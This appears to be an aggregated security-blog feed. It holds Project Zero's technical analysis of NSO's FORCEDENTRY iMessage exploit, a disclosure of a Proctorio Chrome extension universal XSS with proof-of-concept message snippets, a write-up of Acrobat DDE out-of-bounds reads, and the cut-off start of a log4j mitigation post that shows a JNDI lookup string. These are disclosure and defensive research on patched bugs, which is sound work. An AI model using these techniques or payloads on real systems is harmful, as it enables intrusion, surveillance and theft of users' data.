- You’re an engineer just getting started, but you have a strong interest in architecture.
- You’re a seasoned engineer managing an ever-growing codebase that keeps getting slower.
- You’re a technical director and you’d like to see an alternative to how your teams work and ship their code.
- You work with engineers on a daily basis, and you’d really like to understand what they mean when they say a micro-frontend.
- You really just like to read!
In conclusion, read on if you want a better understanding of how you can successfully implement a micro-frontend architecture from start to finish.
How Articles are Structured
Each article in the series is split into two primary parts. The first half (overview, problem, and solution) gives you a high level understanding of the topic of discussion. If you just want to view the “cliff notes”, then these sections are for you.
The second half (diving deeper) is more technical in nature, and is geared towards those who wish to see how we actually implemented the solution. For most of the articles in this series, this section includes a corresponding demo repository that further demonstrates the concepts within the article.
Summary
So, let’s begin! Before we dive into how we updated our architecture, it’s important to discuss the issues we faced that led us to this decision. Check out the next article in the series to get started.
1. Introduction: Our Journey Implementing a Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
Merry Hackmas: multiple vulnerabilities in MSI’s products
This blog post serves as an advisory for a couple of MSI’s products that are affected by multiple high-severity vulnerabilities in the driver components they are shipped with. All the vulnerabilities are triggered by sending specific IOCTL requests and will allow to: Directly interact with physical memory via the MmMapIoSpace function call, mapping physical memory […]
The post Merry Hackmas: multiple vulnerabilities in MSI’s products appeared first on VoidSec.
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution
Posted by Ian Beer & Samuel Groß of Google Project Zero
We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.
Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.
Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.
The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860.
NSO
NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities.
For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products" Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regime, hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff and dozens of other cases.
Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent."
Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.
From One to Zero
In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages:
Screenshots of Phishing SMSs reported to Citizen Lab in 2016
source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.
One weird trick
The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username.
iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif:
[IMGIFUtils copyGifFromPath:toDestinationPath:error]
Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.
The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code.
Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.
A PDF in your GIF
NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser.
PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...
Extreme compression
In the late 1990's, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain specific image codec designed to compress images where pixels can only be black or white.
It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the XEROX WorkCenter device shown below. If you used the scan to pdf functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.
A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2
for its scan-to-pdf functionality
source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications
The PDFs files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:
Technique 1: Segmentation and substitution
Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:
Simple pattern matching can find all the shapes which look similar on a page,
in this case all the 'e's
JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition.) A JBIG encoder is just looking for connected regions of pixels and grouping similar looking regions together. The compression algorithm is to simply substitute all sufficiently-similar looking regions with a copy of just one of them:
Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios
In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations.
There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.
Technique 2: Refinement coding
As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode.
It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:
Using the XOR operator on bitmaps to compute a difference image
In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression.
Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas.
A JBIG2 stream
Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available.
The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a huffman table or rendering a bitmap to given coordinates on the page.
Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.
A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas.
A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.
JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.
The vulnerability
The vulnerability is a classic integer overflow when collating referenced segments:
Guint numSyms; // (1)
numSyms = 0; for (i = 0; i < nRefSegs; ++i) { if ((seg = findSegment(refSegs[i]))) { if (seg->getType() == jbig2SegSymbolDict) { numSyms += ((JBIG2SymbolDict *)seg)->getSize(); // (2) } else if (seg->getType() == jbig2SegCodeTable) { codeTables->append(seg); } } else { error(errSyntaxError, getPos(), "Invalid segment reference in JBIG2 text region"); delete codeTables; return; } } ... // get the symbol bitmaps syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)
kk = 0; for (i = 0; i < nRefSegs; ++i) { if ((seg = findSegment(refSegs[i]))) { if (seg->getType() == jbig2SegSymbolDict) { symbolDict = (JBIG2SymbolDict *)seg; for (k = 0; k < symbolDict->getSize(); ++k) { syms[kk++] = symbolDict->getBitmap(k); // (4) } } } } |
numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.
That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.
Inside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.
Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegments routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).
Conveniently since JBIG2Bitmap inherits from JBIG2Segment the seg->getType() virtual call succeed even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls) but the returned type will now not be equal to jbig2SegSymbolDict thus causing further writes at (4) to not be reached and bounding the extent of the memory corruption.
A simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap
Boundless unbounding
Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render).
JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.
The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow
By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. Since all iOS hardware is little endian (meaning that the w and line fields are likely to be overwritten with 0x1 — the most-significant half of a JBIG2Bitmap pointer) and the segNum and h fields are likely to be overwritten with the least-significant half of such a pointer, a fairly random value depending on heap layout and ASLR somewhere between 0x100000 and 0xffffffff.
This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.
The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:
The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory
By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.
At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?
My other compression format is turing-complete!
As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.
In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:
The memory layout showing how logical operators can be applied out-of-bounds
It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?
You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.
With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:
An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1 creating an NAND.
A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function.
Practical circuits
JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.
The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.
In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.
Proctorio Chrome extension Universal Cross-Site Scripting
The switch to online exams
In February of 2020 the first person in The Netherlands tested positive for COVID-19, which quickly led to a national lockdown. After that universities had to close for physical lectures. This meant that universities quickly had to switch to both online lectures and tests.
For universities this posed a problem: how are you going to prevent students from cheating if they take the test in a location where you have no control nor visibility? In The Netherlands most universities quickly adopted anti-cheating software that students were required to install in order to be able to take a test. This to the dissatisfaction of students, who found this software to be too invasive of their privacy. Students were required to run monitoring software on their personal device that would monitor their behaviour via the webcam and screen recording.
The usage of this software was covered by national media on a regular basis, as students fought to disallow universities to use this kind of software. This led to several court cases were universities had to defend the usage of this software. The judge ended up ruling in favour of the universities.
Proctorio is such monitoring software and it is used by most Dutch universities. For students this comes as a Google Chrome extension. And indeed, the extension has quite an extensive list of permissions. This includes the recording of your screen and permission to read and change all data on the websites that you visit.
All this was reason enough for us to have a closer look to this much debated software. After all, vulnerabilities in this extension could have considerable privacy implications for students with this extension installed. In the end, we found a severe vulnerability that leads to a Universal Cross-Site Scripting vulnerability, which could be triggered by any website. This means that a malicious website visited by the user could steal or modify any data from every website, if the victim had the Proctorio extension installed. The vulnerability has since been fixed by Proctorio. As Chrome extensions are updated automatically, this requires no actions from Proctorio users.
Background
Chrome extensions consist of two parts. A background page with JavaScript is the core of the extension, which has the permissions granted to the extension. It can add scripts to currently open tabs, which are known as content scripts. Content scripts have access to the DOM, but use a separate JavaScript environment. Content scripts do not have the full permissions of the background page, but their ability to communicate with the background page makes them more powerful than the JavaScript on a page itself.
Vulnerability details
The Proctorio extension inspects network traffic of the browser. When requests are observed for paths that match supported test taking websites, it injects some content scripts into the page. It tries to determine if the user is using a Proctorio-enabled test by retrieving details of the test using specific API endpoints used by the supported test websites.
Once a test is started, a toolbar is added with a number of buttons allowing a student to manage Proctorio. This includes a button to open a calculator, which supports some simple mathematical calculations.
When the user clicks the ‘=’ button, a function is called in the content script to compute the result. The computation is performed by calling the eval()
function in JavaScript, in the minified JavaScript this is in the function named ghij
. The function eval()
is a dangerous, as it can execute arbitrary JavaScript, not just mathematical expressions. The function ghij
does not check that the input is actually a mathematical expression.
Because the calculator is added to DOM of the page activating Proctorio, JavaScript on the page can automatically enter an expression for the calculator and then trigger the evaluation. This allows the webpage to execute code inside the content script. From the context of the content script, the page can then send messages to the background page that are handled as messages from the content script. Using a combination of messages, we found we could trigger UXSS.
(In our Zoom exploit, the calculator was opened just to demonstrate our ability to launch arbitrary applications, but in this case we actually exploit the calculator itself!)
Exploitation to UXSS
By using one of a number of specific paths in the URL, adding certain DOM elements and sending specific responses to a small number of API requests Proctorio can be activated by any website without user approval. By pretending to be in demo mode and automatically activating the demo, the page can start a complete Proctorio session. This happens completely automatically, without user interaction. Then, the page can open the calculator and use the exploit to execute code in the content script.
The content script itself does not have the full permissions of the browser extension, but it does have permission to send messages to the background page. The JavaScript on the background page supports a large number of different messages, each identified by a number indicated by the first element of the array which is the message.
The first thing that can be done using that is to download a URL while bypassing the Same Origin Policy. There are a number of different message types that will download a URL and return the result. For example, message number 502:
chrome.runtime.sendMessage([502, '1', '2', 'https://www.google.com/#'], alert);
(The #
is used here to make sure anything which is appended after it is not sent to the server.)
This downloads the URL in the session of the current user and returns the result to the page. This could be used to, for example, retrieve all of the user’s email messages if they are signed in to their webmail if it uses cookies for authentication. Normally, this is not allowed unless the URL uses the same origin, or the response specifically allows it using Cross-Origin Resource Sharing (CORS).
A CORS bypass is already a serious vulnerability, but it can be extended further. A universal cross-site scripting attack can be performed in the following way.
Some messages trigger the adding of new content scripts to the tab. Sometimes, variables need to be passed to those scripts. Most of the time those variables are escaped correctly, but when using a message with number 25, the argument is not escaped. The minified code for this function is:
if (25 == a[0]) return chrome.tabs.executeScript(b.tab.id, {
code: c0693(a[1])
}, function() {}), c({}), !0;
which calls:
function c0693(a) {
return "(" + function(a) {
var b = document.getElementsByTagName("body");
if (b.length) b[0].innerHTML = a; else {
b = document.getElementsByTagName("html")[0];
var c = document.createElement("body");
c.innerHTML = a;
b.appendChild(c);
}
} + ")(" + a + ");";
}
This function c0693()
contains a function which is converted to a string. This inner function not executed by the background page, but by converting it to a string it takes the text of this function, which is then called using the argument a
in the content script. Note that the last line in this function does not escape that value. This means that it is possible to include JavaScript, which is then executed in the context of the content script in the same tab that sent the message.
Evaluating JavaScript in the same tab again is not very useful on its own, but it is possible to make the tab switch origins in between sending the message and the execution of the new script. This is because the call to executeScript
specifies the tab id, which doesn’t change when navigating to a different page.
Message with number 507 uses a synchronous XMLHttpRequest
, which means that the JavaScript of the entire background page will be blocked while waiting for the HTTP response. By sending a request to a URL which is set up to always take 5 seconds to respond, then immediately sending a message with number 25 and then changing the location of the tab, the JavaScript from the 25 message is executed on a new page instead.
For example, the following will allow the https://computest.nl
origin to execute an alert on the https://example.com
origin:
chrome.runtime.sendMessage([507, '1', '2', 'https://computest.nl/sleep#']);
chrome.runtime.sendMessage([25, 'alert(document.domain)']);
document.location = 'https://example.com';
The URL https://computest.nl/sleep
is used here as an example of a URL that takes 5 seconds to respond.
The video below demonstrates the attack:
Finally, the user could notice the fact that Proctorio is enabled based on the color of the Proctorio icon in the browser bar, which turns green once it activates. However, sending a message [32, false]
turns this icon grey again, even though Proctorio is still active. The malicious webpage could quickly turn the icon grey again after exploiting the content script, which means the user only has a few milliseconds to notice the attack.
What can we do with UXSS?
An important security mechanism of your browser is called the Same Origin Policy (SOP). Without SOP surfing the web would be very insecure, as websites would then be able to read data from other domains (origins). It is the most important security control the browser has to enforce.
With an Universal XSS vulnerability a malicious webpage can run JavaScript on other pages, regardless of the origin. This makes this a very powerful primitive for an attacker to have in a browser. The video below shows that we can use this primitive to obtain a screenshot from the webcam and to download a GMail inbox, using our exploit from above.
For stealing GMail data we just need to inject some JavaScript that copies the content of the inbox and sends it to a server under our control. For getting a webcam screenshot we rely on the fact that most people will have allowed certain legitimate domains to have webcam access. In particular, users of Proctorio who had to enable their webcam for a test will have given the legitimate test website permission to use the webcam. We use UXSS to open a tab of such a domain and inject some JavaScript that grabs a webcam screenshot. In the example we rely on the fact that the victim has previously granted the domain zoom.us webcam access. This can be any page, but due to the pandemic we think that zoom.us would be a pretty safe bet. (The stuffed animal is called Dikkie Dik, from a well known Dutch children’s picture book.)
Disclosure
We contacted Proctorio with our findings on June 18th, 2021. They replied back within hours thanking us for our findings. Within a week (on June 25th) they reported that the vulnerability was fixed and a new version was pushed to the Google Chrome Web Store. We verified that the vulnerability was fixed on August 3rd. Since Google Chrome automatically updates installed extensions, this requires no further action from the end-user. At the time of writing version 1.4.21183.1 is the latest version.
In the fixed version, an iframe is used to load a webpage for the calculator, meaning exploiting this vulnerability is no longer possible.
Installing software on your (personal) device, either for work or for study always adds new risks end-users should be aware of. In general it is always wise to deinstall software as soon as you no longer need it, in order to mitigate this risk. In this situation one could disable the Proctorio plugin, to avoid it being accessible when you are not taking a test.
Exploring Acrobat’s DDE attack surface
Introduction
Adobe Acrobat have been our favorite target to poke at for bugs lately, knowing that it's one of the most popular and most versatile PDF readers available. In our previous research, we've been hammering Adobe Acrobat's JavaScript APIs by writing dharma grammars and testing them against Acrobat. As we continue investigating those APIs, we decided as a change of scenery to look into other features Adobe Acrobat has provided. Even though it has a rich attack surface yet we had to find which parts would be a good place to start looking for bugs.
While looking at the broker functions, we noticed that there’s a function that’s accessible through the renderer that triggers DDE calls. That by itself was a reason for us to start looking into the DDE component of Acrobat.
In this blog we'll dive into some of Adobe Acrobat attack surface starting with DDE within adobe using Adobe IAC.
DDE in Acrobat
To understand how DDE works let's first introduce the concept of inter-process communication (IPC).
So, what is IPC? It's a mechanism for processes to communicate with each other provided by the operating system. It could be that one process informs another about an event that has occurred, or it could be managing shared data between processes. In order for these processes to understand each other they have to agree on certain communication approach/protocol. There are several IPC mechanisms supported by windows such as: mailslots, pipes, DDE ... etc.
In Adobe Acrobat DDE is supported through Acrobat IAC which we will discuss later in this blog.
What is DDE?
In short DDE stands for Dynamic Data exchange which is a message-based protocol that is used for sending messages and transferring data between one process to another using shared memory.
In each inter-process communication with DDE, a client and a server engage in a conversation.
A DDE conversation is established using uniquely defined strings as follows:
Service name: a unique string defined by the application that implements the DDE server which will be used by both DDE Client and DDE server to initialize the communication.
Topic name: is a string that identifies a logical data context.
Item name: is a string that identifies a unit of data a server can pass to a client during a transaction.
DDE shares these strings by using it's Global Atom Table. For more details about Atoms. Also, DDE protocol defines how applications should use the wPram and lParam parameters to pass larger data pieces through shared memory handles and global atoms.
When is DDE used?
It is most appropriate for data exchanges that do not require ongoing user interaction. An application using DDE provides a way for the user to exchange data between the two applications. However, once the transfer is established, the applications continue to exchange data without further user intervention as in socket communication.
The ability to use DDE in an application running on windows can be added through DDMEL.
Introducing DDEML
The Dynamic Data Exchange Management Library DDEML by windows makes it easier to add DDE support to an application by providing an interface to simplify managing DDE conversations. Meaning that instead of sending, posting, and processing DDE messages directly, an application can use the DDEML functions to manage DDE conversations.
So, usually the following steps will happen when a DDE client wants to start conversation with the Server:
Initialization
Before calling a DDE functionwe need to register our application with DDEML and specify the transaction filter flags for the callback function, the following functions used for the initialization part:
DdeInitializeW()
DdeInitializeA()
Note: "A" used to indicate "ANSI" A Unicode version with the letter "W" used to indicate "wide"
2. Establishing a Connection
In order to connect our client to a DDE Server we must use the Service and Topic names associated with the application. The following function will return a handle to our connection which will be used later for data transactions and connection termination:
DdeConnect()
3. Data Transaction
In order to send data from DDE client to DDE server we need to call the following function:
DdeClientTransaction()
4. Connection Termination
DDEML provides a function for terminating any DDE conversations and freeing any DDEML resources related:
DdeUninitialize()
Acrobat IAC
As we discussed before about Acrobat, Inter Application Communication (IAC) allows an external application to control and manipulate a PDF file inside Adobe Acrobat using several methods such as OLE and DDE.
For example, let's say you want to merge two PDF documents into one and save that document with a different name, what do we need to achieve that ?
Obviously we need adobe acrobat DC pro .
The service, topic names for acrobat.
Topic name is "Control"
Service Name:
“AcroViewA21" here "A" means Acrobat and "21" refer to the version.
"AcroViewR21" here "R" for Reader.
So, to retrieve the service name for your installation based on the product and the version you can check the registry key:
What is the item we are going to use ?
When we attempt to send a DDE command to the server implemented in acrobat the item will be NULL.
Acrobat Adobe Reader DC supports several DDE messages, but some of these messages require Adobe Acrobat Adobe DC Pro version in order to work.
The format of the message should be between brackets and it's case sensitive. e.g:
Displaying document: such as "[FileOpen()]" and "[DocOpen()]".
Saving and printing documents: such as "[DocSave()]" and "[DocPrint()]".
Searching document: such as "[DocFind()]".
Manipulating document such as: "[DocInsertPage()]" and "[DocDeletePages()]".
Note: that in order to use Acrobat Adobe DDE messages that start with Doc, the file must be opened using [DocOpen()] message.
We started by defining Service and topic names for Adobe Acrobat and the DDE messages we want to send. In our case, we want to merge two Documents into one so we need three DDE methods "[DocOpen()]" , "[DocInsertPages()]" and "[DocSaveAs()]":
Next, as we discussed before, we first need to register our application to DDEML using DdeInitialize():
After the initialization step we have to connect to the DDE server using Service and Topic that we defined earlier:
Now we need to send our message using DdeClientTransaction() and as we can see we used XTYPE_EXECUTE with NULL Item, and our command is stored in HDDEDATA handle by calling DdeCreateDataHandle(). After executing this part of code, Adobe Acrobat will open the PDF document and append the other document to it, and save it as new file then exit Adobe Acrobat:
The last part is closing the connection and cleaning the opened handles:
So we decided to take a look at adobe plugins to see who else is implementing DDE Server by searching for DdeInitilaize() call:
Great 😈 it seems we got five plugins that implement a DDE service, before we analyzing these plugins we went to search for more info about them and we found that the search and catalog plug-ins are documented by Adobe... good what next!
Search Plug-in
We started to read about the search plug-in and we summarized it in the following:
Acrobat has a feature which allows the user to search for a text inside PDF document. But we already mentioned a DDE method called DocFind() right? well, DocFind() will search the PDF document page by page while the search plug-in will perform an indexed search that allows to search a word in the form of a query, so in other word we can search a cataloged PDF 🙂.
So basically the search plug-in allows the client to send search queries and manipulate indexes.
When implementing a client that communicates with the search plug-in the service name and topic's name will be "Acrobat Search" instead of "Acroview".
Remember when we send a DDE request to Adobe Acrobat, the item was NULL, but in search plugin there are two types of items the client can use to submit a query data and one item for manipulating the index:
SimpleQuery item: Allows the user to send a query that support Boolean operation e.g if we want to search for any occurrence of word "bye" or "hello" we can send "bye OR hello".
Query item: this allow different search query and we can specify the parser handling the query.
While the item name used to manipulate indexes is "Index” , the DDE transaction type will be "XTYPE_POKE" which is a single poke transaction.
So, we started by manipulating indexes. When we attempt to do an operation on indexes the data must be in the following form:
Where eAction represents the action to be made on the index:
Adding index
Deleting index
Enabling or Disabling index on the shelf.
The cbData[0] will store the index file path we want to do an action on - example: “C:\\XD\\test.pdx” and PDX file is an index file that is create by one or multiple IDX files.
CVE-2021-39860
So, we started analyzing the function responsible for handling the structure data sent by the client, and turned out there are no check on what data sent.
As we can see after calling DdeAccessData(), the EAX register will storea pointer to our data and we can see it access whatever data at offset 4 . So if we want to trigger an access violation at "movsx eax,word ptr [ecx+4]" simply send a two byte string which result in Out-Of-Bound Read 🙂 as demonstrated in the following crash:
Catalog Plug-in
Acrobat DC has a feature that allows the user to create a full-text index file for one or multiple PDF documents that will be searchable using the search command. The file extension is PDX. It will store the text of all specified PDF documents.
Catalog Plug-in support several DDE methods such as:
[FileOpen(full path)] : Used to open an index file and display the edit index dialog box, the file name must end with PDX extension.
[FilePurge(full path)]: Used to purge index definition file. The file name also must end with PDX extension.
The Topic name for Catalog is "Control" and the service name according to adobe documentation is "Acrobat", however if we check the registry key belonging to adobe catalog we can see that is "Acrocat" (meoww) instead of "Acrobat".
Using IDApro we can see the DDE methods that catalog plugin support along with Service and Topic names:
CVE-2021-39861
Since there are several DDE methods that we can send to the catalog plugin and these DDE methods accept one argument (except for "App related methods") which is a path to a file, we started analyzing the function responsible for handling this argument and turned out 🙂:
The function will check the start of the string (supplied argument) for \xFE\xFF, if it's there then call Bug() function which will read the string as Unicode string, otherwise it will call sub_22007210() which will read the string as ANSI string.
So, if we can send "\xFE\xFF" or byte order mask at the start of ASCII string then probably we will end up with Out-of-bound Read since it will look for Unicode NULL terminator which is "\x00\x00" instead of ASCII NULL terminator.
We can see here the function handling Unicode string :
And 😎:
Here we can see a snippet of the POC:
That’s it for today. Stay tuned for more new attack surfaces blogs!
Happy Hunting!
References
log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228
tl;dr Run our new tool by adding -javaagent:log4j-jndi-be-gone-1.0.0-standalone.jar
to all of your JVM Java stuff to stop log4j from loading classes remotely over LDAP. This will prevent malicious inputs from triggering the “Log4Shell” vulnerability and gaining remote code execution on your systems.
In this post, we first offer some context on the vulnerability, the released fixes (and their shortcomings), and finally our mitigation (or you can skip directly to our mitigation tool here).
Context: log4shell
Hello internet, it’s been a rough week. As you have probably learned, basically every Java app in the world uses a library called “log4j” to handle logging, and that any string passed into those logging calls will evaluate magic ${jndi:ldap://...}
